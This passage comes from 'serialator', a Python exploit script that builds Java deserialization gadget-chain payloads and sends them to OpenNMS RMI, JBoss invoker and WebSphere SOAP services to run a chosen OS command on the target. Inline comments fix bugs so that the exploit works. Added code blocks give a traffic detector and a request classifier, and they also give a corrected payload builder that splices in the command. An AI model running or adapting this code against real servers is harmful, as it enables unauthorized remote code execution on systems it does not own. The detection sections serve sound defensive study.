e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2
e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74'\r

d2 += '\\x00' + chr(clen)\r

d2 += _cmd\r

d2 += '\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f'\r

\r

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r

s.connect((HOST, PORT)) # client side of the exchange: connect out to the target's RMI registry (the original called bind(), which tries to listen on that address locally and never reaches the target)\r

print(\"[i] Sending initial packets to OpenNMS RMI service\")\r

s.sendall(d1)\r

retdata = s.recv(8192)\r

if retdata:\r

#\r

# We have received some data suggesting the OpenNMS RMI Registry has responded.\r

# Time to exploit.\r

#\r

print(\"[+] OpenNMS RMI service responded. Sending the exploit code...\")\r

s.sendall(d2)\r

else:\r

print(\"[-] Sorry, the RMI service didn't respond. Revert to manual attack.\")\r

return 0\r
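What d2 carries is a JRMP Call to the registry's bind() operation whose argument is the CommonsCollections gadget chain (AnnotationInvocationHandler proxy, LazyMap, ChainedTransformer, ConstantTransformer(Runtime), InvokerTransformer). The following is an added example, not part of the serialator script: it decodes that call header and walks the serialized stream for the class descriptors that make up the chain, which is the check a detection engineer would run over captured RMI traffic. The sample bytes are a condensed reconstruction of d2 (the head is verbatim; class names and serialVersionUIDs are copied from the payload above, field lists and values are left out). `classdesc`, `parse_registry_call`, `scan_class_names` and `find_gadgets` are names chosen for this example, and the class-name scan is a heuristic, not a full parser of the stream grammar.

```python
import struct

# Type codes from the Java Object Serialization Stream Protocol that d2 relies on
STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_CLASSDESC, TC_OBJECT, TC_STRING, TC_ARRAY = 0x72, 0x73, 0x74, 0x75
TC_CLASS, TC_BLOCKDATA, TC_ENDBLOCKDATA, TC_PROXYCLASSDESC = 0x76, 0x77, 0x78, 0x7D
RMI_CALL = 0x50                                   # JRMP message type "Call"
REGISTRY_OPS = {0: "bind", 1: "list", 2: "lookup", 3: "rebind", 4: "unbind"}
GADGET_CLASSES = {                                # the CommonsCollections chain carried by d2
    "sun.reflect.annotation.AnnotationInvocationHandler",
    "org.apache.commons.collections.map.LazyMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
}
NAME_CHARS = frozenset(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$.;/[")

def classdesc(name):
    """TC_CLASSDESC, 2-byte length, class name: how the stream introduces a new class."""
    return bytes([TC_CLASSDESC]) + struct.pack(">H", len(name)) + name.encode("ascii")

# Constructed sample: the head of d2 verbatim, then its class descriptors in declaration order
# (serialVersionUIDs copied from the payload above; field lists and values left out)
SAMPLE_CALL = (
    b"\x00\x09127.0.1.1\x00\x00\x00\x00"                      # client endpoint: host, port 0
    + bytes([RMI_CALL]) + STREAM_MAGIC
    + b"\x77\x22" + b"\x00" * 22 + b"\x00\x00\x00\x00"          # TC_BLOCKDATA(34): ObjID 0 = registry, opnum 0 = bind
    + b"\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf"                       # java.rmi.registry.Registry interface hash
    + b"\x74\x00\x05pwned"                                      # TC_STRING: the name passed to bind()
    + b"\x73\x7d\x00\x00\x00\x01\x00\x0fjava.rmi.Remote"        # TC_OBJECT TC_PROXYCLASSDESC, 1 interface
    + b"\x70\x78" + classdesc("java.lang.reflect.Proxy") + b"\xe1\x27\xda\x20\xcc\x10\x43\xcb"
    + b"\x73" + classdesc("sun.reflect.annotation.AnnotationInvocationHandler") + b"\x55\xca\xf5\x0f\x15\xcb\x7e\xa5"
    + b"\x73" + classdesc("java.util.HashMap") + b"\x05\x07\xda\xc1\xc3\x16\x60\xd1"
    + b"\x73" + classdesc("org.apache.commons.collections.map.LazyMap") + b"\x6e\xe5\x94\x82\x9e\x79\x10\x94"
    + b"\x73" + classdesc("org.apache.commons.collections.functors.ChainedTransformer") + b"\x30\xc7\x97\xec\x28\x7a\x97\x04"
    + b"\x73" + classdesc("org.apache.commons.collections.functors.ConstantTransformer") + b"\x58\x76\x90\x11\x41\x02\xb1\x94"
    + b"\x76" + classdesc("java.lang.Runtime") + b"\x00" * 8
    + b"\x73" + classdesc("org.apache.commons.collections.functors.InvokerTransformer") + b"\x87\xe8\xff\x6b\x7b\x7c\xce\x38"
)

def parse_registry_call(buf):
    """Decode the JRMP Call header d2 sends: caller endpoint, ObjID, operation, first argument."""
    off = 0
    (hlen,) = struct.unpack_from(">H", buf, off); off += 2
    host = buf[off:off + hlen].decode("ascii"); off += hlen
    (port,) = struct.unpack_from(">I", buf, off); off += 4
    if buf[off] != RMI_CALL:
        raise ValueError("not a JRMP Call message")
    off += 1
    if buf[off:off + 4] != STREAM_MAGIC:
        raise ValueError("Call is not followed by a serialization stream")
    off += 4
    if buf[off] != TC_BLOCKDATA or buf[off + 1] != 34:
        raise ValueError("expected the 34-byte TC_BLOCKDATA call header")
    off += 2
    # ObjID = objNum(8) + UID(unique 4, time 8, count 2), then operation number(4) and interface hash(8)
    objnum, _unique, _time, _count, opnum, ihash = struct.unpack_from(">qiqhiq", buf, off)
    off += 34
    arg0 = None
    if off < len(buf) and buf[off] == TC_STRING:    # first argument, when it is a String
        (slen,) = struct.unpack_from(">H", buf, off + 1)
        arg0 = buf[off + 3:off + 3 + slen].decode("utf-8")
    return {"host": host, "port": port, "objnum": objnum, "opnum": opnum,
            "operation": REGISTRY_OPS.get(opnum, "?"), "interface_hash": ihash, "arg0": arg0}

def _looks_like_class_name(b):
    return bool(b) and b"." in b and all(c in NAME_CHARS for c in b)

def scan_class_names(buf):
    """Heuristic walk, not a full parser: names from TC_CLASSDESC records that follow TC_OBJECT,
    TC_ARRAY, TC_CLASS or TC_ENDBLOCKDATA, plus the interface list of a TC_PROXYCLASSDESC."""
    names, i = [], 1
    while i + 4 < len(buf):
        tc, prev = buf[i], buf[i - 1]
        if tc == TC_CLASSDESC and prev in (TC_OBJECT, TC_ARRAY, TC_CLASS, TC_ENDBLOCKDATA):
            (n,) = struct.unpack_from(">H", buf, i + 1)
            cand = buf[i + 3:i + 3 + n]
            if 0 < n < 256 and len(cand) == n and _looks_like_class_name(cand):
                names.append(cand.decode("ascii"))
                i += 3 + n
                continue
        elif tc == TC_PROXYCLASSDESC and prev == TC_OBJECT:
            (count,) = struct.unpack_from(">I", buf, i + 1)
            j = i + 5
            for _ in range(min(count, 16)):
                if j + 2 > len(buf):
                    break
                (n,) = struct.unpack_from(">H", buf, j)
                names.append(buf[j + 2:j + 2 + n].decode("ascii", "replace"))
                j += 2 + n
            i = j
            continue
        i += 1
    return names

def find_gadgets(buf):
    """Known gadget classes present in the stream, sorted; empty for a stream that looks benign."""
    return sorted(set(scan_class_names(buf)) & GADGET_CLASSES)
```

`find_gadgets(SAMPLE_CALL)` returns the five CommonsCollections classes, and `parse_registry_call(SAMPLE_CALL)["operation"]` is `"bind"`: the registry never has to resolve the name "pwned" for the chain to fire, because deserialization of the argument happens before the operation is dispatched, which is why an unauthenticated client can trigger it.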

\r

def jboss_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the jboss_java_serialize.nasl script within Nessus \r

\"\"\"\r

This function sets up the attack payload for JBoss\r

\"\"\"\r

body_serObj = hex2raw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r

\r

cleng = len(_cmd)\r

body_serObj += chr(cleng) + _cmd\r

body_serObj += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\")\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

headers = {\"User-Agent\":\"JBoss_RCE_POC\",\r

\"Content-type\":\"application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue\",\r

\"Content-length\":\"%d\" % len(body_serObj)\r

}\r

resp, content = webservice.request(URL_ADDR+\"/invoker/JMXInvokerServlet\", \"POST\", body=body_serObj, headers=headers)\r

# print provided response.\r

print(\"[i] Response received from target: %s\" % resp)\r
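jboss_attack() posts the raw stream to /invoker/JMXInvokerServlet under an application/x-java-serialized-object content type; the websphere_attack() function further down hides the same stream base64-encoded inside a SOAP <params> element, and the Symantec function wraps it in a multipart part. The following is an added example, not part of the serialator script, and it goes beyond the JBoss case above: a request classifier that flags all three wrappings by looking for the stream magic either raw or base64-encoded (`rO0AB`), which is the check to put in front of an invoker servlet or into a WAF rule. The three sample requests are constructed here around a minimal stream; the multipart path and boundary are illustrative, and `find_serialized_objects` and `classify_request` are names chosen for the example.

```python
import base64
import re

STREAM_MAGIC = b"\xac\xed\x00\x05"
B64_RUN = re.compile(rb"rO0AB[A-Za-z0-9+/]{8,}={0,2}")     # base64 of AC ED 00 05 begins "rO0AB"

# Reasons returned by classify_request()
R_CONTENT_TYPE = "serialized-object content-type"
R_INVOKER_PATH = "POST to JBoss invoker servlet"
R_RAW_STREAM = "raw java serialization stream in body"
R_B64_STREAM = "base64 java serialization stream in body"


def find_serialized_objects(body):
    """(offset, encoding) for each Java serialization stream found raw or base64-encoded in body."""
    hits = [(m.start(), "raw") for m in re.finditer(re.escape(STREAM_MAGIC), body)]
    for m in B64_RUN.finditer(body):
        blob = m.group(0)
        blob += b"=" * (-len(blob) % 4)            # pad a run the regex cut short
        try:
            decoded = base64.b64decode(blob)
        except ValueError:                         # binascii.Error is a ValueError
            continue
        if decoded.startswith(STREAM_MAGIC):
            hits.append((m.start(), "base64"))
    return hits


def classify_request(method, path, headers, body):
    """Reasons to alert on one request; an empty list means nothing deserialization-related was seen."""
    reasons = []
    ctype = next((v for k, v in headers.items() if k.lower() == "content-type"), "")
    if "application/x-java-serialized-object" in ctype.lower():
        reasons.append(R_CONTENT_TYPE)
    if method.upper() == "POST" and path.lower().startswith("/invoker/"):
        reasons.append(R_INVOKER_PATH)
    kinds = {enc for _, enc in find_serialized_objects(body)}
    if "raw" in kinds:
        reasons.append(R_RAW_STREAM)
    if "base64" in kinds:
        reasons.append(R_B64_STREAM)
    return reasons


# Constructed samples: a minimal stream (magic, TC_OBJECT TC_CLASSDESC "java.util.HashMap") in the
# three wrappings the script uses; the multipart path and boundary are illustrative, not the real ones
MINI_STREAM = STREAM_MAGIC + b"\x73\x72\x00\x11java.util.HashMap" + b"\x00" * 8
JBOSS_REQ = ("POST", "/invoker/JMXInvokerServlet",
             {"Content-Type": "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"},
             MINI_STREAM)
SOAP_REQ = ("POST", "/",
            {"Content-Type": 'text/xml; charset="UTF-8"', "SOAPAction": '"urn:AdminService"'},
            b"<SOAP-ENV:Envelope><SOAP-ENV:Body><params>" + base64.b64encode(MINI_STREAM)
            + b"</params></SOAP-ENV:Body></SOAP-ENV:Envelope>")
MULTIPART_REQ = ("POST", "/example-upload",
                 {"Content-Type": "multipart/form-data; boundary=----=_Part_0_example"},
                 b"------=_Part_0_example\r\nContent-Type: application/binary\r\n"
                 b'Content-Disposition: form-data; name="Content"\r\n\r\n' + MINI_STREAM
                 + b"\r\n------=_Part_0_example--\r\n")
BENIGN_REQ = ("GET", "/index.html", {}, b"")

if __name__ == "__main__":
    for name, req in (("jboss", JBOSS_REQ), ("websphere", SOAP_REQ), ("symantec", MULTIPART_REQ), ("benign", BENIGN_REQ)):
        print(name, classify_request(*req))
```

The content-type and path checks alone miss the WebSphere and Symantec variants, which is why the body scan is the part that matters; a base64 hit is confirmed by decoding rather than by the `rO0AB` prefix alone, so ordinary base64 text that happens to start with those characters is not flagged.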

\r

def websphere_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the websphere_java_serialize.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for IBM WebSphere\r

\"\"\"\r

serObj3 = hex2raw3(\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E0
01E00000002767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\") # Setup initial parts of the payload packet\r

cleng = len(_cmd) # Get the length of the payload\r

serObj3 += chr(cleng) + _cmd # Convert the length to byte string, prepend to the payload and concatenate with the serialised payload.\r

serObj3 += hex2raw3(\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\") # Complete the payload packet\r

serObjB64_3 = base64.b64encode(serObj3.encode('latin-1')).decode('ascii') # latin-1 maps every byte 0x00-0xFF back one-to-one; the original ascii/errors='ignore' silently dropped the 0xACED stream magic and every other high byte, and the trailing decode keeps %s from inserting b'...' into the XML\r

\r

body = \"\"\"<?xml version='1.0' encoding='UTF-8'?>\r

<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">\r

<SOAP-ENV:Header ns0:JMXConnectorContext=\"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\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">\r

</SOAP-ENV:Header>\r

<SOAP-ENV:Body>\r

<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\r

<objectname xsi:type=\"ns1:javax.management.ObjectName\">rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==</objectname>\r

<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>\r

<params xsi:type=\"ns1:[Ljava.lang.Object;\">%s</params>\r

<signature xsi:type=\"ns1:[Ljava.lang.String;\">rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=</signature>\r

</ns1:invoke>\r

</SOAP-ENV:Body>\r

</SOAP-ENV:Envelope>\"\"\" % serObjB64_3 # Append the payload to the request body.\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

headers = {\"User-Agent\":\"WebSphere_RCE_POC\",\r

\"Content-type\":\"text/xml; charset=\\\"UTF-8\\\"\",\r

\"SOAPAction\":\"\\\"urn:AdminService\\\"\",\r

\"Content-length\":\"%d\" % len(body)\r

}\r

print(\"[i] Sending attack payload to %s\" % URL_ADDR)\r

resp, content = webservice.request(URL_ADDR+\"/\", \"POST\", body=body, headers=headers)\r

# print provided response.\r

print(\"[i] Response received from target: %s\" % resp)\r
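hex2raw3() builds the payload as a str of chr() values, and websphere_attack() then runs it through encode('ascii', errors='ignore') before base64-encoding, which silently drops every byte above 0x7F, starting with the 0xACED stream magic; the `chr(cleng)` splice used by all three HTTP functions also caps the command at 255 bytes. As an added example, not taken from the serialator script, here is a bytes-native builder for the same TC_STRING splice plus a check that puts the lossy encoding path beside the correct one. The hex fragments are the opening and the `exec` tail of the serObj3 hex above, truncated for the example; `hex2bytes`, `java_utf_string`, `splice_command` and the `b64_*` helpers are names chosen here.

```python
import base64
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_STRING = 0x74

# Fragments of the serObj3 hex above, cut short for this example: stream magic, then
# TC_OBJECT TC_CLASSDESC "sun.reflect.annotation.AnnotationInvocationHandler" with its UID ...
PREFIX_HEX = ("ACED0005 7372 0032 73756E2E7265666C6563742E616E6E6F746174696F6E2E"
              "416E6E6F746174696F6E496E766F636174696F6E48616E646C6572 55CAF50F15CB7EA5")
# ... and TC_STRING "exec" plus the TC_ARRAY/TC_REFERENCE that open the next InvokerTransformer args
SUFFIX_HEX = "74 0004 65786563 75 71 007E001E"


def hex2bytes(hexstr):
    """bytes-native stand-in for hex2raw3(): whitespace ignored, real bytes returned."""
    return bytes.fromhex("".join(hexstr.split()))


def java_utf_string(s):
    """TC_STRING with a big-endian 2-byte length, as a String constant is written to the stream."""
    data = s.encode("utf-8")              # Java modified UTF-8 is identical for the ASCII commands used here
    if len(data) > 0xFFFF:
        raise ValueError("command too long for TC_STRING (the stream would need TC_LONGSTRING)")
    return bytes([TC_STRING]) + struct.pack(">H", len(data)) + data


def splice_command(cmd, prefix_hex=PREFIX_HEX, suffix_hex=SUFFIX_HEX):
    """prefix + TC_STRING(cmd) + suffix as bytes. The script's payloads end the prefix with '74 00'
    and append chr(len(cmd)), which caps the command at 255 bytes; this path has no such limit."""
    return hex2bytes(prefix_hex) + java_utf_string(cmd) + hex2bytes(suffix_hex)


def b64_lossy(payload):
    """The websphere_attack() path: a str of chr() values run through encode('ascii', errors='ignore')."""
    as_str = payload.decode("latin-1")    # the str that chr()-concatenation produces
    return base64.b64encode(as_str.encode("ascii", errors="ignore")).decode("ascii")


def b64_exact(payload):
    """The correct path: base64 the raw bytes (str.encode('latin-1') when all you have is the str)."""
    return base64.b64encode(payload).decode("ascii")


def decoded_via(payload, encoder):
    """What the server would deserialize after base64-decoding encoder(payload)."""
    return base64.b64decode(encoder(payload))


def survives_roundtrip(payload, encoder):
    return decoded_via(payload, encoder) == payload


if __name__ == "__main__":
    p = splice_command("ping -c 5 10.0.0.1")
    print("exact path keeps the stream:", survives_roundtrip(p, b64_exact))
    print("ascii/ignore path keeps the stream:", survives_roundtrip(p, b64_lossy))
    print("what the lossy path sends starts with:", decoded_via(p, b64_lossy)[:4].hex())
```

With the lossy path the server sees a body that begins `00 05 73 72` instead of `AC ED 00 05`, so ObjectInputStream rejects it with an invalid-stream-header error and the exploit appears to fail for no visible reason; the same applies to any chr()-built str that is later encoded as UTF-8, where every high byte becomes two bytes.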

\r

if __name__ == \"__main__\":\r

\r

#\r

# Main function\r

#\r

if not sys.version_info >= (3, 0):\r

sys.exit(\"[x] WARNING - this script requires Python 3.x. Exiting\")\r

\r

# Setup command line arguments\r

cmdparser = argparse.ArgumentParser(prog=\"serialator\", usage=\"\"\"\r

____ _ _ _ \r

/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

\\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

___) | __/ | | | (_| | | (_| | || (_) | | \r

|____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

by Nikhil Sreekumar (@roo7break) v {version}\r

\r

Usage: python3 %(prog)s [options]\r

\r

Options:\r

-t Target (required)\r

-p Port (required)\r

-c CMD (required)\r

--serv Target Service (default: websphere)\r

--ssl Use SSL (default: OFF)\r

--test Test if target is vulnerable (default: OFF)\r

\"\"\".format(version=version), formatter_class=argparse.RawTextHelpFormatter)\r

cmdparser.add_argument(\"-t\", \"--target\", default=\"127.0.0.1\", help=\"Target host\", required=True)\r

cmdparser.add_argument(\"-p\", \"--port\", default=\"\", type=int, help=\"Target port\", required=True)\r

cmdparser.add_argument(\"-c\", \"--cmd\", default=\"\", help=\"OS command to execute\")\r

cmdparser.add_argument(\"--serv\", default=\"websphere\", choices=[\"websphere\", \"opennms\", \"jboss\",\"symantec\"])\r

cmdparser.add_argument(\"--ssl\", action=\"store_true\", help=\"Use SSL for target service\")\r

cmdparser.add_argument(\"--test\", action=\"store_true\", help=\"Use to test for vulnerability\")\r

\r

cmdargs = cmdparser.parse_args()\r

\r

if cmdargs.test:\r

answ = input(\"[i] Before we start, I highly recommend you start Wireshark (filter: icmp.type == 8) or ICMPListener, now. Ready? (y/yes) \")\r

if answ.lower() == 'y' or answ.lower() == 'yes':\r

print(\"[i] Awesome. Let's ask the target server to ping our system\")\r

tgtos = input(\"[?] What do you think the target OS is (win/unix): \")\r

if tgtos.lower() == \"win\": # lower() has to be called; the original compared the bound method itself to a string, which is always False\r

host_ip = input(\"[?] Provide LHOST: \")\r

print(\"[i] Windows target selected. Sending 'ping -n 5 <attack_ip>' to target.\")\r

cmdargs.cmd = \"ping -n 5 %s\" % host_ip # assignment: the original wrote == here and never set the command\r

else:\r

host_ip = input(\"[?] Provide LHOST: \")\r

